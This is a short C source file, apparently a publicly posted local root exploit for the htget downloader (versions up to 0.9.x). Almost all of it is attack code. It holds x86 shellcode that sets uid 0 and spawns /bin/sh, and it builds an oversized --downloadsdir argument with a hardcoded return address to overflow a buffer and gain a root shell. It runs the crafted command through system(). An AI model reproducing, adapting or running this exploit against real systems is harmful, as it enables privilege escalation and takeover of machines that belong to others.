/*
htget <= 0.9.x local r00t sploit
by
Darkeagle

htget default in: Debian, Red Hat

(c) darkeagle

*/
#include <stdio.h>
#include <string.h>

static char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh"; // setuid(0); and exec(/bin/sh) code

int main(int argc, char *argv[])
{
long RET;
char *path;
char buf[14000], cmd[14000];

if ( argc < 2 ) { printf("HTGET <= 0.9.x local lame r00t exploit by darkeagle\n\n"); printf("usage: %s <path>\n", argv[0]); exit(0); }

path = argv[1];

RET = 0xbfffc240; // mandrake 10.0 OR

memset(buf, 0x00, sizeof(buf));
memset(buf, 0x43, 10000);

sprintf(buf+10000, "%s", shellcode);

*(long*)&buf[8988] = RET;

sprintf(cmd, "%s --downloadsdir=%s http://unl0ck.org", path, buf);
system(cmd);
}